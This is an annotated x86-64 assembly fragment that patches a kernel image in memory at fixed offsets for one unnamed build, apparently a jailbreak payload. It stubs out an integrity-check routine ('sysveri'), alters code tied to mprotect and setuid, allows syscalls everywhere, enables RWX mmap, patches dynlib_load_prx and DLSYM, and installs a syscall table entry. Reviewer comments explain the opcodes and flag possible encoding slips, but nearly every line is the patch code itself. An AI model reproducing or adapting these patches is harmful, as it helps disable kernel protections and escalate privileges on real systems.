- // Overview: a straight-line run of stores that overwrite bytes at hard-coded offsets from rdi.
- // rdi is the base of every address used below; presumably it holds the kernel image base - confirm against the caller.
- // The offsets are fixed numbers for one specific build (not named on this page); on any other build the
- // same stores land on unrelated bytes. rsi is overwritten twice as scratch; mov and lea leave the flags untouched.
- // NOTE(review): the fragment assumes the target pages are already writable - nothing here lifts write protection.
- // Every store replaces resident code or data in place, so an integrity measurement over these ranges should show the change.
- // Kill sysveri
- // ("sysveri" is the author's label and is not expanded on the page.)
- // 0xC3 is the `ret` opcode; 0xC3C03148 is stored little-endian as 48 31 C0 C3 = `xor rax, rax; ret`.
- // If each target is a function entry (not shown here), the routine returns at once, with rax = 0 for the dword form.
- mov byte ptr [rdi + 0x636850], 0xC3
- mov dword ptr [rdi + 0x637380], 0xC3C03148
- mov dword ptr [rdi + 0x636600], 0xC3C03148
- mov dword ptr [rdi + 0x636DB0], 0xC3C03148
- // Clears a single byte at an offset far above the others; presumably a data flag rather than code - confirm.
- mov byte ptr [rdi + 0x2662B00], 0x00
- // mprotect
- // The 64-bit pattern is staged in rsi because x86-64 has no store of a full 64-bit immediate to memory.
- // In memory it reads 90 90 90 90 90 90 49 8B: six NOPs, then 49 8B, which presumably rewrites the bytes already there - confirm.
- mov rsi, 0x8B49909090909090
- mov qword ptr [rdi + 0x3014C8], rsi
- // setuid
- // NOTE(review): this writes B8 00 00 00. B8 opens `mov eax, imm32`, which is five bytes long, so the
- // last immediate byte keeps whatever value is already in memory - confirm that this is intended.
- mov dword ptr [rdi + 0x37A320], 0xB8
- // Allow syscall everywhere
- // Zeroes one dword, replaces two 2-byte spans with NOP NOP (0x9090), and writes 90 E9 (0xE990):
- // a NOP followed by the `jmp rel32` opcode. The displacement bytes after E9 are not written and keep
- // their existing value - presumably a 6-byte conditional jump made unconditional; confirm against a disassembly.
- mov dword ptr [rdi + 0x490], 0x0
- mov word ptr [rdi + 0x4B9], 0x9090
- mov word ptr [rdi + 0x4BD], 0x9090
- mov word ptr [rdi + 0x4C6], 0xE990
- // RWX mmap
- // Two single-byte stores of 0x37, three bytes apart; what the bytes encode (presumably immediates
- // inside instructions) is not shown on this page - confirm.
- mov byte ptr [rdi + 0xDB17D], 0x37
- mov byte ptr [rdi + 0xDB180], 0x37
- // Patch dynlib_load_prx
- // Same 90 E9 pattern as above: NOP plus the `jmp rel32` opcode, existing displacement bytes left in place.
- mov word ptr [rdi + 0x451E04], 0xE990
- // DLSYM
- // First store is the 90 E9 pattern again; the second writes 48 31 C0 C3 (`xor rax, rax; ret`) at +0x29A30.
- mov word ptr [rdi + 0x4523C4], 0xE990
- mov dword ptr [rdi + 0x29A30], 0xC3C03148
- // Syscall 11
- // Three stores inside one 0x30-byte span: qword 2, a pointer to rdi + 0x1F842, and dword 1.
- // This looks like filling in one table entry; the field meanings are not shown here - confirm against the structure definition.
- // rsi is overwritten again by the lea.
- mov qword ptr [rdi + 0x1122550], 0x2
- lea rsi, [rdi + 0x1F842]
- mov qword ptr [rdi + 0x1122558], rsi
- mov dword ptr [rdi + 0x112257C], 0x1